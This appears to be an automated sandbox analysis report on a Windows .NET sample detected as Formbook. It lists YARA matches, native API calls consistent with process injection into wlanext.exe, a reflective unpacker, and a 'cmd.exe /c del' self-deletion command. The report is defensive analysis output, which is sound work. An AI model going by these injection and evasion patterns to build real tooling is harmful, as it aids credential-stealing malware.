Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 0_2_0159E9F8	0_2_0159E9F8
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 0_2_0159E9EA	0_2_0159E9EA
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 0_2_0159BD9C	0_2_0159BD9C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00401028	3_2_00401028
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00401174	3_2_00401174
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041D278	3_2_0041D278
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041D338	3_2_0041D338
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041CBFB	3_2_0041CBFB
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00408C8B	3_2_00408C8B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00408C90	3_2_00408C90
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041BD37	3_2_0041BD37
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041C74F	3_2_0041C74F
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189F900	3_2_0189F900
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B4120	3_2_018B4120
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AB090	3_2_018AB090
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C20A0	3_2_018C20A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019620A8	3_2_019620A8
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019628EC	3_2_019628EC
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951002	3_2_01951002
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196E824	3_2_0196E824
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CEBB0	3_2_018CEBB0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195DBD2	3_2_0195DBD2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019503DA	3_2_019503DA
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01962B28	3_2_01962B28
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BAB40	3_2_018BAB40
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019622AE	3_2_019622AE
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0194FA2B	3_2_0194FA2B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2581	3_2_018C2581
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019625DD	3_2_019625DD
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AD5E0	3_2_018AD5E0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01962D07	3_2_01962D07
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01890D20	3_2_01890D20
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01961D55	3_2_01961D55
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A841F	3_2_018A841F
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195D466	3_2_0195D466
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196DFCE	3_2_0196DFCE
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01961FF1	3_2_01961FF1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01962EF7	3_2_01962EF7
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195D616	3_2_0195D616
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B6E30	3_2_018B6E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E2B28	7_2_036E2B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DDBD2	7_2_036DDBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364EBB0	7_2_0364EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E22AE	7_2_036E22AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03634120	7_2_03634120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361F900	7_2_0361F900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036D1002	7_2_036D1002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E28EC	7_2_036E28EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E20A8	7_2_036E20A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362B090	7_2_0362B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E1FF1	7_2_036E1FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03636E30	7_2_03636E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DD616	7_2_036DD616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E2EF7	7_2_036E2EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E1D55	7_2_036E1D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03610D20	7_2_03610D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E2D07	7_2_036E2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362D5E0	7_2_0362D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E25DD	7_2_036E25DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03642581	7_2_03642581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DD466	7_2_036DD466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362841F	7_2_0362841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321D338	7_2_0321D338
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321CBFB	7_2_0321CBFB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321D278	7_2_0321D278
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321C74F	7_2_0321C74F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03202FB0	7_2_03202FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321BD37	7_2_0321BD37
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03202D90	7_2_03202D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03208C8B	7_2_03208C8B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03208C90	7_2_03208C90

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 0361B150 appears 35 times
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: String function: 0189B150 appears 48 times

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_004185F0 NtCreateFile,	3_2_004185F0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_004186A0 NtReadFile,	3_2_004186A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_00418720 NtClose,	3_2_00418720
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_004187D0 NtAllocateVirtualMemory,	3_2_004187D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_004185EB NtCreateFile,	3_2_004185EB
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0041871A NtClose,	3_2_0041871A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk,	3_2_018D99A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_018D9910
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_018D98F0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk,	3_2_018D9840
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_018D9860
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_018D9A00
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk,	3_2_018D9A20
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk,	3_2_018D9A50
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D95D0 NtClose,LdrInitializeThunk,	3_2_018D95D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9540 NtReadFile,LdrInitializeThunk,	3_2_018D9540
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,	3_2_018D9780
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_018D97A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9FE0 NtCreateMutant,LdrInitializeThunk,	3_2_018D9FE0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,	3_2_018D9710
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_018D96E0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_018D9660
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D99D0 NtCreateProcessEx,	3_2_018D99D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9950 NtQueueApcThread,	3_2_018D9950
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D98A0 NtWriteVirtualMemory,	3_2_018D98A0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9820 NtEnumerateKey,	3_2_018D9820
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018DB040 NtSuspendThread,	3_2_018DB040
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018DA3B0 NtGetContextThread,	3_2_018DA3B0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9B00 NtSetValueKey,	3_2_018D9B00
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9A80 NtOpenDirectoryObject,	3_2_018D9A80
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9A10 NtQuerySection,	3_2_018D9A10
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D95F0 NtQueryInformationFile,	3_2_018D95F0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9520 NtWaitForSingleObject,	3_2_018D9520
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018DAD30 NtSetContextThread,	3_2_018DAD30
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9560 NtWriteFile,	3_2_018D9560
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018DA710 NtOpenProcessToken,	3_2_018DA710
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9730 NtQueryVirtualMemory,	3_2_018D9730
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9760 NtOpenProcess,	3_2_018D9760
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018DA770 NtOpenThread,	3_2_018DA770
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9770 NtSetInformationFile,	3_2_018D9770
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D96D0 NtCreateKey,	3_2_018D96D0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9610 NtEnumerateValueKey,	3_2_018D9610
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9650 NtQueryValueKey,	3_2_018D9650
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D9670 NtQueryInformationProcess,	3_2_018D9670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659A50 NtCreateFile,LdrInitializeThunk,	7_2_03659A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_03659910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036599A0 NtCreateSection,LdrInitializeThunk,	7_2_036599A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03659860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659840 NtDelayExecution,LdrInitializeThunk,	7_2_03659840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659710 NtQueryInformationToken,LdrInitializeThunk,	7_2_03659710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659FE0 NtCreateMutant,LdrInitializeThunk,	7_2_03659FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659780 NtMapViewOfSection,LdrInitializeThunk,	7_2_03659780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03659660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659650 NtQueryValueKey,LdrInitializeThunk,	7_2_03659650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036596E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_036596E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036596D0 NtCreateKey,LdrInitializeThunk,	7_2_036596D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659540 NtReadFile,LdrInitializeThunk,	7_2_03659540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036595D0 NtClose,LdrInitializeThunk,	7_2_036595D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659B00 NtSetValueKey,	7_2_03659B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0365A3B0 NtGetContextThread,	7_2_0365A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659A20 NtResumeThread,	7_2_03659A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659A00 NtProtectVirtualMemory,	7_2_03659A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659A10 NtQuerySection,	7_2_03659A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659A80 NtOpenDirectoryObject,	7_2_03659A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659950 NtQueueApcThread,	7_2_03659950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036599D0 NtCreateProcessEx,	7_2_036599D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0365B040 NtSuspendThread,	7_2_0365B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659820 NtEnumerateKey,	7_2_03659820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036598F0 NtReadVirtualMemory,	7_2_036598F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036598A0 NtWriteVirtualMemory,	7_2_036598A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659760 NtOpenProcess,	7_2_03659760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0365A770 NtOpenThread,	7_2_0365A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659770 NtSetInformationFile,	7_2_03659770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659730 NtQueryVirtualMemory,	7_2_03659730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0365A710 NtOpenProcessToken,	7_2_0365A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036597A0 NtUnmapViewOfSection,	7_2_036597A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659670 NtQueryInformationProcess,	7_2_03659670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659610 NtEnumerateValueKey,	7_2_03659610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659560 NtWriteFile,	7_2_03659560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03659520 NtWaitForSingleObject,	7_2_03659520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0365AD30 NtSetContextThread,	7_2_0365AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036595F0 NtQueryInformationFile,	7_2_036595F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03218720 NtClose,	7_2_03218720
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032187D0 NtAllocateVirtualMemory,	7_2_032187D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032186A0 NtReadFile,	7_2_032186A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032185F0 NtCreateFile,	7_2_032185F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0321871A NtClose,	7_2_0321871A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032185EB NtCreateFile,	7_2_032185EB

Source: 1D4l9eR0W4.exe, 00000000.00000002.664696995.0000000000EE8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLi.exe4 vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000000.00000002.664916018.00000000015A0000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000000.00000002.666422561.0000000006610000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000003.00000000.661143351.0000000000E58000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLi.exe4 vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000003.00000002.714245379.0000000001B1F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe, 00000003.00000002.714367021.0000000001BC2000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs 1D4l9eR0W4.exe
Source: 1D4l9eR0W4.exe	Binary or memory string: OriginalFilenameLi.exe4 vs 1D4l9eR0W4.exe

Source: 1D4l9eR0W4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 1D4l9eR0W4.exe	Virustotal: Detection: 25%
Source: 1D4l9eR0W4.exe	ReversingLabs: Detection: 24%

Source: 1D4l9eR0W4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1D4l9eR0W4.exe "C:\Users\user\Desktop\1D4l9eR0W4.exe"
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process created: C:\Users\user\Desktop\1D4l9eR0W4.exe C:\Users\user\Desktop\1D4l9eR0W4.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process created: C:\Users\user\Desktop\1D4l9eR0W4.exe C:\Users\user\Desktop\1D4l9eR0W4.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1D4l9eR0W4.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@13/10

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1D4l9eR0W4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1D4l9eR0W4.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 1D4l9eR0W4.exe, 1D4l9eR0W4.exe, 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, 1D4l9eR0W4.exe, 00000003.00000002.714005352.000000000198F000.00000040.00000001.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: 1D4l9eR0W4.exe, 00000003.00000002.714332060.0000000001BB0000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 1D4l9eR0W4.exe, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.1D4l9eR0W4.exe.e80000.0.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.1D4l9eR0W4.exe.e80000.0.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.1D4l9eR0W4.exe.df0000.1.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.1D4l9eR0W4.exe.df0000.1.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.1D4l9eR0W4.exe.df0000.0.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.1D4l9eR0W4.exe.df0000.3.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.1D4l9eR0W4.exe.df0000.2.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.1D4l9eR0W4.exe.df0000.5.unpack, cC/cP.cs	.Net Code: BAG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
